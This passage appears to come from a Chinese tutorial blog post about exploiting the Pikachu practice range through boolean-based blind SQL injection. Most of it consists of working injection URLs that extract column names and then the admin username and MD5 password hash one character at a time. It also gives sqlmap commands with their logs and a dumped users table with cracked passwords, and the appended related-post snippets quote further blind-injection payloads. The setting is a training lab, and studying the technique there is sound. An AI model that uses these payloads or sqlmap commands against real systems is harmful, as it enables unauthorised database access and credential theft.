http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 7, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 8, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: username
列 2: username
[*] 正在探测表 users 的第 3 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 2, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 5, 1) = 'w') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 6, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 7, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: password
列 3: password
[*] 正在探测表 users 的第 4 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 1, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 3, 1) = 'v') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 4, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: level
列 4: level

(4)探测数据

 接下来探测users表的第一行数据,如下所示用户名为admin,根据密码存储的md5值可推断出密码为123456,其中md5加密后的值为e10adc3949ba59abbe56e057f20f883e,具体如下所示。

[*] 开始提取 users.id 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT id FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT id FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: 1
4: 1

[*] 开始提取 users.username 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 5 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 1, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 4, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: admin
4: admin

[*] 开始提取 users.password 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT password FROM users LIMIT 0,1)) = 32) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 32 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 1, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 2, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 3, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 5, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 6, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 7, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 8, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 9, 1) = '4') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 10, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 11, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 12, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 13, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 14, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 15, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 16, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 17, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 18, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 19, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 20, 1) = '6') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 21, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 22, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 23, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 24, 1) = '7') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 25, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 26, 1) = '2') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 27, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 28, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 29, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 30, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 31, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 32, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: e10adc3949ba59abbe56e057f20f883e
4: e10adc3949ba59abbe56e057f20f883e

[*] 开始提取 users.level 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT level FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT level FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 提取完成: 1
4: 1

3、sqlmap渗透

python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump

这个命令执行后只能找到基于时间的注入方法,提示如下所示。

GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: name (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=mooyuan' AND (SELECT 7670 FROM (SELECT(SLEEP(5)))vJLD) AND 'Zxcy'='Zxcy&submit=%E6%9F%A5%E8%AF%A2

如果增加了--technique=B参数则直接无法进行渗透,提示没有注入点,具体如下所示。

[05:20:51] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=mn9mirug87r...aprvlnnef7'). Do you want to use those [Y/n] Y
[05:20:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:20:52] [INFO] testing if the target URL content is stable
[05:20:52] [INFO] target URL content is stable
[05:20:52] [INFO] testing if GET parameter 'name' is dynamic
[05:20:53] [WARNING] GET parameter 'name' does not appear to be dynamic
[05:20:53] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[05:20:53] [INFO] testing for SQL injection on GET parameter 'name'
[05:20:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:55] [WARNING] GET parameter 'name' does not seem to be injectable
[05:20:55] [INFO] testing if GET parameter 'submit' is dynamic
[05:20:55] [WARNING] GET parameter 'submit' does not appear to be dynamic
[05:20:55] [WARNING] heuristic (basic) test shows that GET parameter 'submit' might not be injectable
[05:20:55] [INFO] testing for SQL injection on GET parameter 'submit'
[05:20:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:59] [WARNING] GET parameter 'submit' does not seem to be injectable
[05:20:59] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[05:20:59] [WARNING] your sqlmap version is outdated

这是因为布尔型注入的渗透,sqlmap不清楚True和False时的输出,如果正确指定则可以正常渗透,具体命令如下所示。

sqlmap -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump --technique=B --not-string="不存在"
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 13 HTTP(s) requests:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=mooyuan' AND 7085=7085 AND 'XcNF'='XcNF&submit=%E6%9F%A5%E8%AF%A2
---
Database: pikachu                                                                                                                                                                                                                          
Table: users
[3 entries]
+----+---------+-------------------------------------------+----------+
| id | level   | password                                  | username |
+----+---------+-------------------------------------------+----------+
| 1  | 1       | e10adc3949ba59abbe56e057f20f883e (123456) | admin    |
| 2  | 2       | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu  |
| 3  | 3       | e99a18c428cb38d5f260853678922e03 (abc123) | test     |
+----+---------+-------------------------------------------+----------+
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4368
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
11.SQL注入-盲注基于(base on boolian)
愿听风成曲
07-05 441
输入kobe直接返回正确的信息,输入kobe’ and 1=1#也返回了正确的信息,证明and被后台执行了。根据payload语句执行成功,则可以判断出数据库第一个字符ascii=112,转换成字符为p。输入的内容是否正确,返回的信息比较少,只有两种返回结果:正确或者是用户名不存在。通过上面的图例子,我们可以利用左右都为真,则判断数据库名称的字符,多次进行测试。现在则继续测试第二个字符,我这里是多次测试得出来得结果105转换字符为:i。同样也可以进行爆出该数据库下的表名的字符,数字为104转成字符为h。
Pikachu-Sql-Inject -基于boolian的盲注
guanrongl的专栏
10-03 1267
布尔型盲注入用到得SQL 语句select if(1=1,1,0) if()函数在mysql 是判断,第一个参数表达式,如果条件成立,会显示1,否则显示0。从前面已经知道有个用户 为 vince ,如果长度判断正确,回返回vince 这个用户,错误则显示不存在;if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0。2、不管是正确的输入,还是错误的输入,都只显示两种情况,true or false;第一个 1 ,代表查第一张表,第二个1,1 代表查第一个字母;
pikachu 布尔盲注
weixin_58358185的博客
10-26 1108
Pikachu布尔盲注--思路
pikachu的盲注(base on boolian
weixin_50339082的博客
06-15 1638
pikachu的盲注(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。 ...
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6977
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu SQL 注入(盲注)
weixin_60508121的博客
04-19 4272
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
DVWA靶场SQL注入布尔盲注练习
2301_80038718的博客
11-02 1138
(一个个爆出来):select first_name,last_name from users where user_id=‘1’ and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’ limit 0,1)));
SQL注入-Pikachu靶场通关_pikachu靶场通关sql
2401_87034306的博客
09-12 596
接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为其他类型的闭合方式,接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致,区别就是类型不同,本题为字符型,单引号闭合,其他注入语句和以上一致。接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为搜索型,其他的爆库爆表爆字段内容的sql语句以上注册时注入的一致。
Pikachu靶场--Sql Inject
qq_65150735的博客
06-30 1485
Pikachu靶场--Sql Inject(SQL注入)
pikachu盲注
miaositekali的博客
02-21 462
pikachu盲注
Pikachu布尔盲注结合BurpSuite获取数据库名字详解
小小小屿屿屿的博客
11-18 929
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注。盲注根据展现方式,分为布尔型盲注和时间型盲注。
pikachu靶机-sql注入
最新发布
C-HOWE的博客
01-20 1479
本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解。
基于boolean盲注的案例演示
weixin_43534549的博客
04-07 1082
一、 打开pikachu,点击盲注(base on boolian),输入一个单引号,点提交,这时候你会发现显示结果为“您输入的username不存在,请重新输入”。 二、输入“kobe’ or 1=1#",点查询,同样也会提示“您输入的username不存在,请重新输入” 三、进一步来判断 输入"kobe’ and 1=1#",这时候发现打印出了正确的输出,即 四、若输入"kobe’ and...
pikachu盲注(时间)
2301_79595769的博客
12-23 463
属于盲注的一种,不同于布尔的是:布尔盲注是需要有两个页面,一对一错来判断注入是否正确,而时间盲注可以在不返回正确错误页面的情况下进行准确注入(错误正确只返回一个页面,布尔盲注无法实施)在执行正确和错误的语句时均返回一个页面,无法通过回显判断注入的是否正确。若立马响应,那就说明并不存在注入点或者猜测的数字/字母错误。通过是否执行sleep函数来判断猜测的语句是否正确。若语句正确,执行sleep(5)使页面停顿5秒。随后输入kobe' and sleep(5)#一般是在布尔盲注都行不通的情况下才使用时间盲注。
